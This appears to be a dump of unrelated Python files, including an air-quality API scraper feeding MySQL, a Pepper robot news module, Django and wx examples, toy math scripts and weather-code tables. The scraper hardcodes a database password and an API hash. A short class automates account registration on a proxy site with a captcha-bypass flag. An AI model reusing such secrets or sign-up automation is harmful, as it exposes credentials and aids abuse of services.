# for device in ticket.user.devices.all():
# if not device.device_token:
# log += "\nSkipped Device, No Token"
# continue
#
# if device.is_ios():
# apn = APNSender(device.device_token, text=text,
# custom={"code": "frenzy", "gameType": game_type,"state":state_codes[ticket.division.remote_id]})
# apn.send()
# log += "\nAPN Outbound: %s" % device.device_token
# elif device.is_android():
# gcm = GCMSender(to=[device.device_token], data={"text": text,
# "code": "frenzy", "gameType": game_type,"state":ticket.division.remote_id,"draw_id":draw_id
# })
# gcm.send()
# log += "\nGCM Outbound: %s" % device.device_token
#
# return log
|
### Author: Lihua Pei (Neo)
### Email: lihua.peidata@gmail.edu
### Created at July 2019
#### Step 1 import Packages ######################################################################################################################################
import pymysql.cursors
import time
import pandas as pd
import numpy as np
import requests
#### Step 2 setup functions ##################################################################################################################################
# Function 1: a timer set every 20s send a request by uRAD API
def sleeptime(hour, minute, sec):
return hour*3600 + minute*60 + sec
second = sleeptime(0,0,20)
# Function 2: Preprocess data decode time value to time_string
def Preprocessing_uRAD_API_min(_time):
time_local = time.localtime(_time)
time_string = time.strftime("%Y-%m-%d %H:%M", time_local)
time_struct = time.struct_time(time_local)
time_year = time_struct[0]
time_month = time_struct[1]
time_day = time_struct[2]
time_hour = time_struct[3]
time_minute = time_struct[4]
time_list= [time_string, time_year, time_month, time_day, time_hour, time_minute]
return time_list
# Function 3: MySQL insert function
class Minute_1A_SQL_Writer_API_updating_one():
def __init__(self,df, cursor, connection):
self.cursor = cursor
self.conn = connection
"""Load data from JSON object
Args:
user (dict) - json of object
"""
self.uRAD = '1400001A'
self.location = 'River Terrace'
self.Time_Str_Minute = df.get('Time_Str',None)
self.Year = int(df.get('Year', None))
self.Month = int(df.get('Month', None))
self.Day = int(df.get('Day', None))
self.Hour = int(df.get('Hour',None))
self.Minute = int(df.get('minute',None))
self.Particulate_Matter_PM1 = df.get('pm1', None)
self.Particulate_Matter_PM25 = df.get('pm25', None)
self.Particulate_Matter_PM10 = df.get('pm10', None)
self.Ozone_O3_ppm = df.get('gas1',None)
self.Nitrogen_Dioxide_NO2_ppm = df.get('gas2',None)
self.Sulfer_Dioxide_SO2_ppm = df.get('gas3', None)
self.Carbon_Monoxide_CO_ppm = df.get('gas4', None)
self.VOC = df.get('vocaqi',None)
self.Temperature = df.get('temperature', None)
self.Pressure = df.get('pressure', None)
self.Humidity = df.get('humidity', None)
self.Noise = df.get('noise',None)
self.latitude = df.get('latitude', None)
self.longitude = df.get('longitude',None)
try:
self.Particulate_Matter_PM1 = float(self.Particulate_Matter_PM1)
except:
pass
try:
self.VOC = float(self.VOC)
except:
pass
try:
self.Particulate_Matter_PM25 = float(self.Particulate_Matter_PM25)
except:
pass
try:
self.Particulate_Matter_PM10 = float(self.Particulate_Matter_PM10)
except:
pass
try:
self.Ozone_O3_ppm = float(self.Ozone_O3_ppm)
except:
pass
try:
self.Nitrogen_Dioxide_NO2_ppm = float(self.Nitrogen_Dioxide_NO2_ppm)
except:
pass
try:
self.Sulfer_Dioxide_SO2_ppm = float(self.Sulfer_Dioxide_SO2_ppm)
except:
pass
try:
self.Carbon_Monoxide_CO_ppm = float(self.Carbon_Monoxide_CO_ppm)
except:
pass
try:
self.Temperature = float(self.Temperature)
except:
pass
try:
self.Pressure = float(self.Pressure)
except:
pass
try:
self.Humidity = float(self.Humidity)
except:
pass
try:
self.Noise = float(self.Noise)
except:
pass
try:
self.latitude = float(self.latitude)
except:
pass
try:
self.longitude = float(self.longitude)
except:
pass
def insert(self):
"""Inserts a list of objects into the given connection
Args:
objs (list) - list of SQL helper objects
"""
try:
self.cursor.execute(self.get_insert_query(), self.get_values())
except Exception as e:
print(e)
self.conn.commit()
def get_values(self):
"""Get the values used for inseritng a SQL record
Returns:
tuple - tuple in ordered format for SQL table
"""
values = (self.uRAD,self.location, self.Time_Str_Minute, self.Year,self.Month,
self.Day, self.Hour, self.Minute, self.Particulate_Matter_PM1, self.Particulate_Matter_PM25,
self.Particulate_Matter_PM10,
self.Ozone_O3_ppm, self.Nitrogen_Dioxide_NO2_ppm, self.Sulfer_Dioxide_SO2_ppm,
self.Carbon_Monoxide_CO_ppm,self.VOC,self.Temperature,self.Pressure,self.Humidity,self.Noise,self.latitude,self.longitude)
return values
def get_insert_query(self):
"""Get the string SQL insert statement
Returns:
str - insert statement
"""
_insert = f"""INSERT INTO 1400001A_Minute_Average VALUES (%s,%s, %s, %s, %s,%s,%s, %s, %s, %s, %s, %s, %s, %s,%s,%s,%s,%s,%s,%s,%s,%s)"""
return _insert
class Minute_18_SQL_Writer_API_updating_one():
def __init__(self,df, cursor, connection):
self.cursor = cursor
self.conn = connection
"""Load data from JSON object
Args:
user (dict) - json of object
"""
self.uRAD = '14000018'
self.location = 'River Terrace'
self.Time_Str_Minute = df.get('Time_Str',None)
self.Year = int(df.get('Year', None))
self.Month = int(df.get('Month', None))
self.Day = int(df.get('Day', None))
self.Hour = int(df.get('Hour',None))
self.Minute = int(df.get('minute',None))
self.Particulate_Matter_PM1 = df.get('pm1', None)
self.Particulate_Matter_PM25 = df.get('pm25', None)
self.Particulate_Matter_PM10 = df.get('pm10', None)
self.Ozone_O3_ppm = df.get('gas1',None)
self.Nitrogen_Dioxide_NO2_ppm = df.get('gas2',None)
self.Sulfer_Dioxide_SO2_ppm = df.get('gas3', None)
self.Carbon_Monoxide_CO_ppm = df.get('gas4', None)
self.VOC = df.get('vocaqi',None)
self.Temperature = df.get('temperature', None)
self.Pressure = df.get('pressure', None)
self.Humidity = df.get('humidity', None)
self.Noise = df.get('noise',None)
self.latitude = df.get('latitude', None)
self.longitude = df.get('longitude',None)
try:
self.Particulate_Matter_PM1 = float(self.Particulate_Matter_PM1)
except:
pass
try:
self.VOC = float(self.VOC)
except:
pass
try:
self.Particulate_Matter_PM25 = float(self.Particulate_Matter_PM25)
except:
pass
try:
self.Particulate_Matter_PM10 = float(self.Particulate_Matter_PM10)
except:
pass
try:
self.Ozone_O3_ppm = float(self.Ozone_O3_ppm)
except:
pass
try:
self.Nitrogen_Dioxide_NO2_ppm = float(self.Nitrogen_Dioxide_NO2_ppm)
except:
pass
try:
self.Sulfer_Dioxide_SO2_ppm = float(self.Sulfer_Dioxide_SO2_ppm)
except:
pass
try:
self.Carbon_Monoxide_CO_ppm = float(self.Carbon_Monoxide_CO_ppm)
except:
pass
try:
self.Temperature = float(self.Temperature)
except:
pass
try:
self.Pressure = float(self.Pressure)
except:
pass
try:
self.Humidity = float(self.Humidity)
except:
pass
try:
self.Noise = float(self.Noise)
except:
pass
try:
self.latitude = float(self.latitude)
except:
pass
try:
self.longitude = float(self.longitude)
except:
pass
def insert(self):
"""Inserts a list of objects into the given connection
Args:
objs (list) - list of SQL helper objects
"""
try:
self.cursor.execute(self.get_insert_query(), self.get_values())
except Exception as e:
print(e)
self.conn.commit()
def get_values(self):
"""Get the values used for inseritng a SQL record
Returns:
tuple - tuple in ordered format for SQL table
"""
values = (self.uRAD,self.location, self.Time_Str_Minute, self.Year,self.Month,
self.Day, self.Hour, self.Minute, self.Particulate_Matter_PM1, self.Particulate_Matter_PM25,
self.Particulate_Matter_PM10,
self.Ozone_O3_ppm, self.Nitrogen_Dioxide_NO2_ppm, self.Sulfer_Dioxide_SO2_ppm,
self.Carbon_Monoxide_CO_ppm,self.VOC,self.Temperature,self.Pressure,self.Humidity,self.Noise,self.latitude,self.longitude)
return values
def get_insert_query(self):
"""Get the string SQL insert statement
Returns:
str - insert statement
"""
_insert = f"""INSERT INTO 14000018_Minute_Average VALUES (%s,%s, %s, %s, %s,%s,%s, %s, %s, %s, %s, %s, %s, %s,%s,%s,%s,%s,%s,%s,%s,%s)"""
return _insert
class Minute_1C_SQL_Writer_API_updating_one():
def __init__(self,df, cursor, connection):
self.cursor = cursor
self.conn = connection
"""Load data from JSON object
Args:
user (dict) - json of object
"""
self.uRAD = '1400001C'
self.location = 'River Terrace'
self.Time_Str_Minute = df.get('Time_Str',None)
self.Year = int(df.get('Year', None))
self.Month = int(df.get('Month', None))
self.Day = int(df.get('Day', None))
self.Hour = int(df.get('Hour',None))
self.Minute = int(df.get('minute',None))
self.Particulate_Matter_PM1 = df.get('pm1', None)
self.Particulate_Matter_PM25 = df.get('pm25', None)
self.Particulate_Matter_PM10 = df.get('pm10', None)
self.Ozone_O3_ppm = df.get('gas1',None)
self.Nitrogen_Dioxide_NO2_ppm = df.get('gas2',None)
self.Sulfer_Dioxide_SO2_ppm = df.get('gas3', None)
self.Carbon_Monoxide_CO_ppm = df.get('gas4', None)
self.VOC = df.get('vocaqi',None)
self.Temperature = df.get('temperature', None)
self.Pressure = df.get('pressure', None)
self.Humidity = df.get('humidity', None)
self.Noise = df.get('noise',None)
self.latitude = df.get('latitude', None)
self.longitude = df.get('longitude',None)
try:
self.Particulate_Matter_PM1 = float(self.Particulate_Matter_PM1)
except:
pass
try:
self.VOC = float(self.VOC)
except:
pass
try:
self.Particulate_Matter_PM25 = float(self.Particulate_Matter_PM25)
except:
pass
try:
self.Particulate_Matter_PM10 = float(self.Particulate_Matter_PM10)
except:
pass
try:
self.Ozone_O3_ppm = float(self.Ozone_O3_ppm)
except:
pass
try:
self.Nitrogen_Dioxide_NO2_ppm = float(self.Nitrogen_Dioxide_NO2_ppm)
except:
pass
try:
self.Sulfer_Dioxide_SO2_ppm = float(self.Sulfer_Dioxide_SO2_ppm)
except:
pass
try:
self.Carbon_Monoxide_CO_ppm = float(self.Carbon_Monoxide_CO_ppm)
except:
pass
try:
self.Temperature = float(self.Temperature)
except:
pass
try:
self.Pressure = float(self.Pressure)
except:
pass
try:
self.Humidity = float(self.Humidity)
except:
pass
try:
self.Noise = float(self.Noise)
except:
pass
try:
self.latitude = float(self.latitude)
except:
pass
try:
self.longitude = float(self.longitude)
except:
pass
def insert(self):
"""Inserts a list of objects into the given connection
Args:
objs (list) - list of SQL helper objects
"""
try:
self.cursor.execute(self.get_insert_query(), self.get_values())
except Exception as e:
print(e)
self.conn.commit()
def get_values(self):
"""Get the values used for inseritng a SQL record
Returns:
tuple - tuple in ordered format for SQL table
"""
values = (self.uRAD,self.location, self.Time_Str_Minute, self.Year,self.Month,
self.Day, self.Hour, self.Minute, self.Particulate_Matter_PM1, self.Particulate_Matter_PM25,
self.Particulate_Matter_PM10,
self.Ozone_O3_ppm, self.Nitrogen_Dioxide_NO2_ppm, self.Sulfer_Dioxide_SO2_ppm,
self.Carbon_Monoxide_CO_ppm,self.VOC,self.Temperature,self.Pressure,self.Humidity,self.Noise,self.latitude,self.longitude)
return values
def get_insert_query(self):
"""Get the string SQL insert statement
Returns:
str - insert statement
"""
_insert = f"""INSERT INTO 1400001C_Minute_Average VALUES (%s, %s,%s, %s, %s,%s,%s, %s, %s, %s, %s, %s, %s, %s,%s,%s,%s,%s,%s,%s,%s,%s)"""
return _insert
class Minute_58_SQL_Writer_API_updating_one():
def __init__(self,df, cursor, connection):
self.cursor = cursor
self.conn = connection
"""Load data from JSON object
Args:
user (dict) - json of object
"""
self.uRAD = '14000058'
self.location = 'River Terrace'
self.Time_Str_Minute = df.get('Time_Str',None)
self.Year = int(df.get('Year', None))
self.Month = int(df.get('Month', None))
self.Day = int(df.get('Day', None))
self.Hour = int(df.get('Hour',None))
self.Minute = int(df.get('minute',None))
self.Particulate_Matter_PM1 = df.get('pm1', None)
self.Particulate_Matter_PM25 = df.get('pm25', None)
self.Particulate_Matter_PM10 = df.get('pm10', None)
self.Ozone_O3_ppm = df.get('gas1',None)
self.Nitrogen_Dioxide_NO2_ppm = df.get('gas2',None)
self.Sulfer_Dioxide_SO2_ppm = df.get('gas3', None)
self.Carbon_Monoxide_CO_ppm = df.get('gas4', None)
self.VOC = df.get('vocaqi',None)
self.Temperature = df.get('temperature', None)
self.Pressure = df.get('pressure', None)
self.Humidity = df.get('humidity', None)
self.Noise = df.get('noise',None)
self.latitude = df.get('latitude', None)
self.longitude = df.get('longitude',None)
try:
self.Particulate_Matter_PM1 = float(self.Particulate_Matter_PM1)
except:
pass
try:
self.VOC = float(self.VOC)
except:
pass
try:
self.Particulate_Matter_PM25 = float(self.Particulate_Matter_PM25)
except:
pass
try:
self.Particulate_Matter_PM10 = float(self.Particulate_Matter_PM10)
except:
pass
try:
self.Ozone_O3_ppm = float(self.Ozone_O3_ppm)
except:
pass
try:
self.Nitrogen_Dioxide_NO2_ppm = float(self.Nitrogen_Dioxide_NO2_ppm)
except:
pass
try:
self.Sulfer_Dioxide_SO2_ppm = float(self.Sulfer_Dioxide_SO2_ppm)
except:
pass
try:
self.Carbon_Monoxide_CO_ppm = float(self.Carbon_Monoxide_CO_ppm)
except:
pass
try:
self.Temperature = float(self.Temperature)
except:
pass
try:
self.Pressure = float(self.Pressure)
except:
pass
try:
self.Humidity = float(self.Humidity)
except:
pass
try:
self.Noise = float(self.Noise)
except:
pass
try:
self.latitude = float(self.latitude)
except:
pass
try:
self.longitude = float(self.longitude)
except:
pass
def insert(self):
"""Inserts a list of objects into the given connection
Args:
objs (list) - list of SQL helper objects
"""
try:
self.cursor.execute(self.get_insert_query(), self.get_values())
except Exception as e:
print(e)
self.conn.commit()
def get_values(self):
"""Get the values used for inseritng a SQL record
Returns:
tuple - tuple in ordered format for SQL table
"""
values = (self.uRAD,self.location, self.Time_Str_Minute, self.Year,self.Month,
self.Day, self.Hour, self.Minute, self.Particulate_Matter_PM1, self.Particulate_Matter_PM25,
self.Particulate_Matter_PM10,
self.Ozone_O3_ppm, self.Nitrogen_Dioxide_NO2_ppm, self.Sulfer_Dioxide_SO2_ppm,
self.Carbon_Monoxide_CO_ppm,self.VOC,self.Temperature,self.Pressure,self.Humidity,self.Noise,self.latitude,self.longitude)
return values
def get_insert_query(self):
"""Get the string SQL insert statement
Returns:
str - insert statement
"""
_insert = f"""INSERT INTO 14000058_Minute_Average VALUES (%s,%s, %s, %s, %s,%s,%s, %s, %s, %s, %s, %s, %s, %s,%s,%s,%s,%s,%s,%s,%s,%s)"""
return _insert
class Minute_5A_SQL_Writer_API_updating_one():
def __init__(self,df, cursor, connection):
self.cursor = cursor
self.conn = connection
"""Load data from JSON object
Args:
user (dict) - json of object
"""
self.uRAD = '1400005A'
self.location = 'River Terrace'
self.Time_Str_Minute = df.get('Time_Str',None)
self.Year = int(df.get('Year', None))
self.Month = int(df.get('Month', None))
self.Day = int(df.get('Day', None))
self.Hour = int(df.get('Hour',None))
self.Minute = int(df.get('minute',None))
self.Particulate_Matter_PM1 = df.get('pm1', None)
self.Particulate_Matter_PM25 = df.get('pm25', None)
self.Particulate_Matter_PM10 = df.get('pm10', None)
self.Ozone_O3_ppm = df.get('gas1',None)
self.Nitrogen_Dioxide_NO2_ppm = df.get('gas2',None)
self.Sulfer_Dioxide_SO2_ppm = df.get('gas3', None)
self.Carbon_Monoxide_CO_ppm = df.get('gas4', None)
self.VOC = df.get('vocaqi',None)
self.Temperature = df.get('temperature', None)
self.Pressure = df.get('pressure', None)
self.Humidity = df.get('humidity', None)
self.Noise = df.get('noise',None)
self.latitude = df.get('latitude', None)
self.longitude = df.get('longitude',None)
try:
self.Particulate_Matter_PM1 = float(Particulate_Matter_PM1)
except:
pass
try:
self.Particulate_Matter_PM25 = float(self.Particulate_Matter_PM25)
except:
pass
try:
self.Particulate_Matter_PM10 = float(self.Particulate_Matter_PM10)
except:
pass
try:
self.Ozone_O3_ppm = float(self.Ozone_O3_ppm)
except:
pass
try:
self.Nitrogen_Dioxide_NO2_ppm = float(self.Nitrogen_Dioxide_NO2_ppm)
except:
pass
try:
self.Sulfer_Dioxide_SO2_ppm = float(self.Sulfer_Dioxide_SO2_ppm)
except:
pass
try:
self.Carbon_Monoxide_CO_ppm = float(self.Carbon_Monoxide_CO_ppm)
except:
pass
try:
self.Temperature = float(self.Temperature)
except:
pass
try:
self.Pressure = float(self.Pressure)
except:
pass
try:
self.Humidity = float(self.Humidity)
except:
pass
try:
self.Noise = float(self.Noise)
except:
pass
try:
self.latitude = float(self.latitude)
except:
pass
try:
self.longitude = float(self.longitude)
except:
pass
def insert(self):
"""Inserts a list of objects into the given connection
Args:
objs (list) - list of SQL helper objects
"""
try:
self.cursor.execute(self.get_insert_query(), self.get_values())
except Exception as e:
print(e)
self.conn.commit()
def get_values(self):
"""Get the values used for inseritng a SQL record
Returns:
tuple - tuple in ordered format for SQL table
"""
values = (self.uRAD,self.location, self.Time_Str_Minute, self.Year,self.Month,
self.Day, self.Hour, self.Minute, self.Particulate_Matter_PM1, self.Particulate_Matter_PM25,
self.Particulate_Matter_PM10,
self.Ozone_O3_ppm, self.Nitrogen_Dioxide_NO2_ppm, self.Sulfer_Dioxide_SO2_ppm,
self.Carbon_Monoxide_CO_ppm,self.VOC,self.Temperature,self.Pressure,self.Humidity,self.Noise,self.latitude,self.longitude)
return values
def get_insert_query(self):
"""Get the string SQL insert statement
Returns:
str - insert statement
"""
_insert = f"""INSERT INTO 1400005A_Minute_Average VALUES (%s,%s, %s, %s, %s,%s,%s, %s, %s, %s, %s, %s, %s, %s,%s,%s,%s,%s,%s,%s,%s,%s)"""
return _insert
def API_New_Data(API_string):
API_header = {"X-User-id": '5517', "X-User-hash":"5c14f499c252f325c6dc43811bdce283"}
r= requests.get(API_string, headers=API_header)
r= r.json()
new_API_data = r[-1]
_time = new_API_data.get('time')
time_list = Preprocessing_uRAD_API_min(_time)
new_API_data.update({'Time_Str': time_list[0],'Year':time_list[1],'Month':time_list[2],'Day':time_list[3],'Hour':time_list[4],'minute':time_list[5]})
return new_API_data
#### Step 3 Operation Part ###################################################################################################################################################################################################
# Connect to the database
connection = pymysql.connect(host='127.0.0.1',
# host = 127.0.0.1 or host = 'localhost'(本地电脑)
port= 3306,
db = 'freshairdata',
user = 'freshairdc',
password = 'C8<CuFAFW7Vi<LUL',
cursorclass=pymysql.cursors.DictCursor)
#From our connection we need a cursor, which acts as our interface into the database
cur = connection.cursor()
cur = connection.cursor()
while 1 == 1:
try:
time.sleep(second)
try:
new_1A_data = API_New_Data('https://data.uradmonitor.com/api/v1/devices/1400001A/all/')
Minute_1A_SQL_Writer_API_updating_one(new_1A_data,cur,connection).insert()
except:
pass
try:
new_1C_data = API_New_Data('https://data.uradmonitor.com/api/v1/devices/1400001C/all/')
Minute_1C_SQL_Writer_API_updating_one(new_1C_data,cur,connection).insert()
except:
pass
try:
new_18_data = API_New_Data('https://data.uradmonitor.com/api/v1/devices/14000018/all/')
Minute_18_SQL_Writer_API_updating_one(new_18_data,cur,connection).insert()
except:
pass
try:
new_58_data = API_New_Data('https://data.uradmonitor.com/api/v1/devices/14000058/all/')
Minute_58_SQL_Writer_API_updating_one(new_58_data,cur,connection).insert()
except:
pass
try:
new_5A_data = API_New_Data('https://data.uradmonitor.com/api/v1/devices/1400005A/all/')
Minute_5A_SQL_Writer_API_updating_one(new_5A_data,cur,connection).insert()
except:
pass
except:
pass
|
#! /usr/bin/env python
# -*- encoding: UTF-8 -*-
import time
from Modules.module import ModuleBaseClass
from Applications.RSSNewsHandler import RSSNewsHandler
import re
class NewsModule(ModuleBaseClass):
"""
An example module.
"""
def __init__(self, app, name, pepper_ip):
"""
Initialisation of module and event detection.
"""
# Folder name on Pepper
folder_name = "newsModule"
# Superclass init call
super(NewsModule, self).__init__(app, name, pepper_ip, folder_name)
self.rss = RSSNewsHandler()
# Subscribe to events raised in dialog or on button click
self.exit_subscriber = self.memory.subscriber("exit_button_clicked")
self.exit_id = self.exit_subscriber.signal.connect(self.click_exit_button)
self.news_click_subscriber = self.memory.subscriber("news_clicked")
self.news_click_id = self.news_click_subscriber.signal.connect(self.click_news_button)
def display_on_tablet(self, full_file_name):
"""
Display file on Pepper's tablet
:param full_file_name: file name including file ending
"""
super(NewsModule, self).display_on_tablet(full_file_name)
def run(self):
"""
Initiate dialog upon method call. Run until finished, then shutoff.
"""
self.module_finished = False
# Subscribe to dialog
self.news_topic = self.dialog.loadTopic("/home/nao/News_enu.top")
self.dialog.activateTopic(self.news_topic)
self.dialog.subscribe(self.name)
full_file_name = "news.html"
self.display_on_tablet(full_file_name)
while not self.module_finished:
time.sleep(1)
self.shutoff()
def shutoff(self, *_args):
"""
Shutoff and unsubscribe to events. Trigger ModuleFinished event.
"""
try:
self.tablet.hideWebview()
print "Tabletview stopped"
except:
pass
try:
self.tts.resetSpeed()
print "Speech speed reset"
except:
pass
try:
self.dialog.deactivateTopic(self.news_topic)
self.dialog.unloadTopic(self.news_topic)
self.dialog.unsubscribe(self.name)
print "Stopped news dialog"
except RuntimeError:
pass
except AttributeError:
pass
def click_news_button(self, news_clicked):
"""
Callback for module events.
"""
print "Entered clickNewsButton with value %s" % news_clicked
self.say_random_news(news_clicked)
def click_exit_button(self, *_args):
self.tablet.hideWebview()
self.tts.say('That was the news with me, Pepper')
self.module_finished = True
def say_random_news(self, site_key):
"""
An example interaction
"""
self.tts.setParameter("speed", 85)
news_article = self.rss.get_random_news(site_key)
self.tts.say(re.sub('<[^<]+?>', '', news_article.title))
time.sleep(1)
if site_key != 'fox':
self.tts.say(re.sub('<[^<]+?>', '', news_article.summary.split('<div')[0])) # Reuters trick
self.tts.resetSpeed()
|
from BusinessLogicLayer.cluster.master import ActionMasterGeneral
class ActionMxCloud(ActionMasterGeneral):
def __init__(self, register_url='https://www.mxyssr.me/auth/register', silence=True):
super(ActionMxCloud, self).__init__(register_url=register_url, silence=silence, life_cycle=2,
hyper_params={'anti_slider': True})
if __name__ == '__main__':
# action_speed(ActionMxCloud, power=1, silence=True)
ActionMxCloud(silence=False).run()
|
import linecache
import time
def ascii_art():
ascii_art = "ascii.txt"
for x in range(0, 7):
print(linecache.getline(ascii_art, x), end="")
time.sleep(0.1)
print("\n")
|
from time import time
start = time()
l_dic = {}
for i in range(3,1000000):
s = i
s_list = [s]
while s != 1:
if s%2 == 0:
s = s/2
else:
s = 3*s + 1
s_list.append(s)
l_dic[i] = len(s_list)
print sorted(l_dic.items(), key=lambda x:x[1], reverse = True)[0]
print "1 : Seconds", time() - start
|
class FactorCalculator:
def test_factor(x, y):
if y % x == 0:
return True
else:
return False
#print(test_factor(4, 1024))
|
from django import forms
from django.shortcuts import render, HttpResponse
from django.shortcuts import redirect
from django.http import HttpResponseRedirect
from .models import Details
#from .forms import CreateNewList
# Create your views here.
def index(request):
#Getting data from the HTML and accepting
if request.method == 'POST':
#form = Details(request.POST)
name = request.POST['name']
email = request.POST['email']
phone = request.POST['phone']
comment = request.POST['comment']
#Creating the Object of record every time user clicks on 'Add Data'
'''
if form.isvalid():
return redirect('/success/')
'''
obj = Details()
obj.name = name
obj.email = email
obj.phone = phone
obj.comment = comment
obj.save()
#Fetching the details and saving in an dictionary
from django.core import serializers
data = serializers.serialize("python",Details.objects.all())
#Dictionary to store the data and send it back to HTML format
context = {
'data':data,
}
for row in Details.objects.all():
if Details.objects.filter(phone=row.phone).count() > 1:
row.delete()
#return HttpResponseRedirect("/sample")
'''
if request.method == 'POST':
myfunc()
'''
return render(request, 'contact_us.html', context)
def self(request):
return render(request, 'index.html')
def about(request):
return render(request, 'about_us.html')
def sample(request):
return render(request, 'sample.html')
def myfunc():
return HttpResponseRedirect('/sample')
|
"""This example adds a nice status bar to a SketchWindow frame"""
import wx
from SketchWindow import SketchWindow
class SketchFrame(wx.Frame):
def __init__(self, parent):
wx.Frame.__init__(self, parent, -1, "Sketch Frame",
size=(800, 600))
self.sketch = SketchWindow(self, -1)
self.sketch.Bind(wx.EVT_MOTION, self.OnSketchMotion)
self.statusbar = self.CreateStatusBar()
self.statusbar.SetFieldsCount(3)
self.statusbar.SetStatusWidths([-1,-2,-3])
def OnSketchMotion(self, event):
statuses = [
"Pos: %s" % str(event.GetPositionTuple()),
"current Pts: %s" % len(self.sketch.curLine),
"Line Count: %s" % len(self.sketch.lines) ]
for i, status in enumerate(statuses):
self.statusbar.SetStatusText(status, i)
event.Skip() # Pass the event on so SketchFrame can handle it too
if __name__ == "__main__":
app = wx.PySimpleApp()
frame = SketchFrame(None)
frame.Show(True)
app.MainLoop()
|
# -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.datasets import load_breast_cancer
cancer = load_breast_cancer()
type(cancer)
cancer.keys()
cancer['data']
type(cancer['data'])
cancer['target']
cancer['target_names']
print(cancer['DESCR'])
print(cancer['feature_names'])
print(cancer['filename'])
df = pd.DataFrame(np.c_[cancer['data'],cancer['target']],columns=np.append(cancer['feature_names'],['target']))
df.head()
df.isnull().sum()#so we dont have nan values
# pair plot of sample feature
sns.pairplot(df, hue = 'target',
vars = ['mean radius', 'mean texture', 'mean perimeter', 'mean area', 'mean smoothness'] )
sns.countplot(df['target'])#using this graph we can see that 0 is malignant
plt.figure(figsize=(20,8))
sns.countplot(df['mean radius'])
X = df.drop(['target'],axis=1)
y = df['target']
from sklearn.model_selection import train_test_split
X_train,X_test,y_train,y_test = train_test_split(X,y,test_size=0.2,random_state=5)
from sklearn.preprocessing import StandardScaler
sc = StandardScaler()
X_train_sc = sc.fit_transform(X_train)
X_test_sc = sc.transform(X_test)
from sklearn.metrics import confusion_matrix,classification_report,accuracy_score
dt2 = DecisionTreeClassifier(criterion = 'entropy', random_state = 51)
dt2.fit(X_train_sc, y_train)
y_pred_dt_sc = dt2.predict(X_test_sc)
accuracy_score(y_test, y_pred_dt_sc)
xgb_classifier2 = XGBClassifier()
xgb_classifier2.fit(X_train_sc, y_train)
y_pred_xgb_sc = xgb_classifier2.predict(X_test_sc)
accuracy_score(y_test, y_pred_xgb_sc)
|
"""Given two lists. concatenate them (that is, combine them into a single list).
For example, given [1, 2] and [3, 4]:
>>> concat_lists([1, 2], [3, 4])
[1, 2, 3, 4]
It should work if either list is empty:
>>> concat_lists([], [1, 2])
[1, 2]
>>> concat_lists([1, 2], [])
[1, 2]
>>> concat_lists([], [])
[]
"""
def concat_lists(list1, list2):
"""Combine lists."""
return list1 + list2 |
primes = []
for i in range(2,100):
for x in range(2,i):
if (i % x == 0):
break
else:
primes.append(i)
print(primes) |
wth = {
0: '晴',
1: '多云',
2: '阴',
3: '阵雨',
4: '雷阵雨',
5: '雷阵雨伴有冰雹',
6: '雨夹雪',
7: '小雨',
8: '中雨',
9: '大雨',
10: '暴雨',
11: '大暴雨',
12: '特大暴雨',
13: '阵雪',
14: '小雪',
15: '中雪',
16: '大雪',
17: '暴雪',
18: '雾',
19: '冻雨',
20: '沙尘暴',
21: '小到中雨',
22: '中到大雨',
23: '大到暴雨',
24: '暴雨到大暴雨',
25: '大暴雨到特大暴雨',
26: '小到中雪',
27: '中到大雪',
28: '大到暴雪',
29: '浮尘',
30: '扬沙',
31: '强沙尘暴',
53: '霾'
}
windDirect = {
0: '北风',
45: '东北风',
90: '东风',
135: '东南风',
180: '南风',
225: '西南风',
270: '西风',
315: '西北'
}
def windDri(win):
if win in windDirect.keys():
return windDirect[win]
else:
if 0 < win < 45:
return '北偏东'
if 45 < win < 90:
return '东偏北'
if 90 < win < 135:
return '东偏南'
if 135 < win < 180:
return '南偏东'
if 180 < win < 225:
return '南偏西'
if 225 < win < 270:
return '西偏南'
if 270 < win < 315:
return '西偏北'
if 315 < win < 360:
return '北偏西'
def windlevel(speed):
if speed <= 0.2:
return "微风"
elif 0.2 < speed <= 1.5:
return "1级"
elif 1.5 < speed <= 3.3:
return "2级"
elif 3.3 < speed <= 5.4:
return "3级"
elif 5.4 < speed <= 7.9:
return "4级"
elif 7.9 < speed <= 10.7:
return "5级"
elif 10.7 < speed <= 13.8:
return "6级"
elif 13.8 < speed <= 17.1:
return "7级"
elif 17.1 < speed <= 20.7:
return "8级"
elif 20.7 < speed <= 24.4:
return "9级"
elif 24.4 < speed <= 28.4:
return "10级"
elif 28.4 < speed <= 32.6:
return "11级"
elif 32.6 < speed <= 132:
return "12级以上"
|
###
# Copyright (c) 2013, jbub
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
import re
import supybot.ircmsgs as ircmsgs
import supybot.callbacks as callbacks
try:
from supybot.i18n import PluginInternationalization
_ = PluginInternationalization('Imdb')
except ImportError:
_ = lambda x:x
from .api import choices
URL_REGEX = re.compile('http:\/\/www\.imdb\.com\/title\/tt(\d+)\/?')
def create_api(plugin):
api = plugin.registryValue('apiName')
if not api in choices:
